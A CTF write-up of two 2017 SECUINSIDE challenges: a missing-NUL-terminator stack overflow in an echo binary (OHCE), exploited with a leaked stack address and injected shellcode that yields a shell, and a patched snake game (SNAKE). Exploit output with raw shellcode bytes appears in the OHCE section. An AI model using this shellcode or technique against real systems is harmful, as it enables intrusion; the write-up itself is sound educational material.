20170701_SECUINSIDECTF Writeup


Yesterday and today I took part in 20170701_SECUINSIDECTF. There were many difficult problems, and some I could not solve.

Fortunately, I could solve two problems, OHCE and SNAKE. My solutions are written below.

OHCE pwn

 

This is a stack-based overflow challenge. The program works as follows.

 

– First it prints a menu, and I can choose 1. echo, 2. reverse echo, or 3. exit

– If I choose 1, I can type something, and it echoes it back

– If I choose 2, I can type something, and it returns the string I typed, reversed

– If I choose 3, the program exits

Let’s analyze it. First, note that it has no protections at all:

$ checksec ohce
[*] '/mnt/hgfs/VM-Share/20170701_SECUINSIDECTF/ohce/ohce'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE

 

Next, I kept running it, and after several minutes I found a null-byte termination vulnerability: the input buffer is not NUL-terminated.

If I input 31+32*n characters in echo mode, the data following the buffer is leaked. And when I input the same in reverse echo, the program crashes.

—————–
1. echo
2. echo(Reverse)
3. Exit
—————–
> 1
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
�?Hc�
—————–
1. echo
2. echo(Reverse)
3. Exit
—————–
> 2
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
�cH?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaSegmentation fault (core dumped)

 

What happened? The picture below shows the stack after inputting 31+32*n characters.

(Unfortunately, in this picture the data at 0x7fffffffdae0 is 00, so the leak does not occur here…)

Then, in reverse echo, because of the same null-byte termination vulnerability, the reversal also covers the data after the buffer, so I can overwrite the next address.

Finally, the overwritten value is loaded into rsp by [0x400268 mov rsp,rbp], so I get control of rip.
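The bug class behind both the leak and the overwrite, as an added C model (not the challenge binary's code, and not from the original post): an echo/reverse-echo handler that stores input without a NUL terminator, beside the terminated version. The frame_t struct and its SAVED-RBP marker are assumptions standing in for the real stack layout; on a full 32-byte input, strlen() runs on into the data above the buffer, which is what echo reads back and what the in-place reversal overwrites.

```c
#include <string.h>
#define BUF_SIZE 32
#define MARKER "SAVED-RBP"

/* Constructed stand-in for the handler's stack frame: the 32-byte input buffer
 * and, directly above it, a marker in place of the real saved data. */
typedef struct { char buf[BUF_SIZE]; char above[16]; } frame_t;

/* Stops the optimizer folding strlen() on a buffer it can see is unterminated. */
static frame_t *opaque(frame_t *f) { __asm__ __volatile__("" : "+r"(f)); return f; }

/* Vulnerable store: copies up to BUF_SIZE bytes and never terminates, so a full
 * 32-byte input leaves string functions reading on into `above`. */
static void store_unterminated(frame_t *f, const char *in, size_t len) {
    if (len > BUF_SIZE) len = BUF_SIZE;
    memcpy(f->buf, in, len);
}
/* Hardened store: reserve one byte for the terminator and always write it. */
static void store_terminated(frame_t *f, const char *in, size_t len) {
    if (len > BUF_SIZE - 1) len = BUF_SIZE - 1;
    memcpy(f->buf, in, len);
    f->buf[len] = '\0';
}
/* Reverse-echo core: strlen() decides how far the in-place swap runs. */
static void reverse_in_place(char *s) {
    size_t n = strlen(s);
    for (size_t i = 0; i < n / 2; i++) {
        char t = s[i]; s[i] = s[n - 1 - i]; s[n - 1 - i] = t;
    }
}
/* Frame holding a full 32-byte input ('a' * 32), stored either way. */
static frame_t *fill(frame_t *f, int terminated) {
    char in[BUF_SIZE];
    memset(in, 'a', sizeof in);
    memset(f, 0, sizeof *f);
    memcpy(f->above, MARKER, sizeof MARKER);
    (terminated ? store_terminated : store_unterminated)(f, in, sizeof in);
    return opaque(f);
}
/* Bytes echo would print: 41 (32 + marker) unterminated, 31 terminated. */
size_t echo_len(int terminated) {
    frame_t f;
    return strlen(fill(&f, terminated)->buf);
}
/* 1 if the data above buf survives reverse-echo of the full input, else 0. */
int above_intact_after_reverse(int terminated) {
    frame_t f, *p = fill(&f, terminated);
    reverse_in_place(p->buf);
    return memcmp(p->above, MARKER, sizeof MARKER) == 0;
}
```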

 

The exploitation steps are below.

– First, leak a stack address by writing 31 characters in echo

– Next, in echo, write many characters followed by the stack address that points to the shellcode (the address in the red rectangle)

– Then, in reverse echo, write the shellcode followed by the stack address that points to the address below (the address in the light blue rectangle).

 
$ python solve_ohce.py
[+] Opening connection to 13.124.134.94 on port 8888: Done
—————–
\x001. echo
2. echo(Reverse)
3. Exit\x00
—————–
\x00 >
0x7ffe4db737a0
0x7ffe4db73770
\x7f\xfeM\xb76`AAAAA\x05\x0f;\xb0^TWR\x99_TS��H\xff\x97\x8cБ\x96\x9dѻH�1\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
[*] Switching to interactive mode
\x00\x7f\xfeM\xb77\xa0
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x901�H\xbbѝ\x96\x91Ќ\x97\xffH��ST_\x99RWT^\xb0;\x0f\x05AAAAA`6\xb7M\xfe\x7f$
$
$
$
$
$ ls
flag
ohce
$ cat flag
SECU[the_true_world_and_1n_here_1s_the_dream]
[*] Got EOF while reading in interactive
$
 

SNAKE rev

 

This is an old-style snake game program.

After several hours of investigation, I worked out that its algorithm is as below. (The function names are mine.)

This program calculates enc_flag and XORs it with other data in the clear_game function.

At first I tried to write a script to generate that data, but I could not. So I changed my approach as below.

– I patched the program so that the if(judge_goal) statement always evaluates to true.

– I patched the program so that it does not change time_duration.

Then I ran it, and after several minutes I got the flag. (You must keep the snake from crashing into the wall until the flag appears.)

SECU[hack_is_the_wine_of_life._Let’s_drink_it.]�u����@
 
Patched program:

 
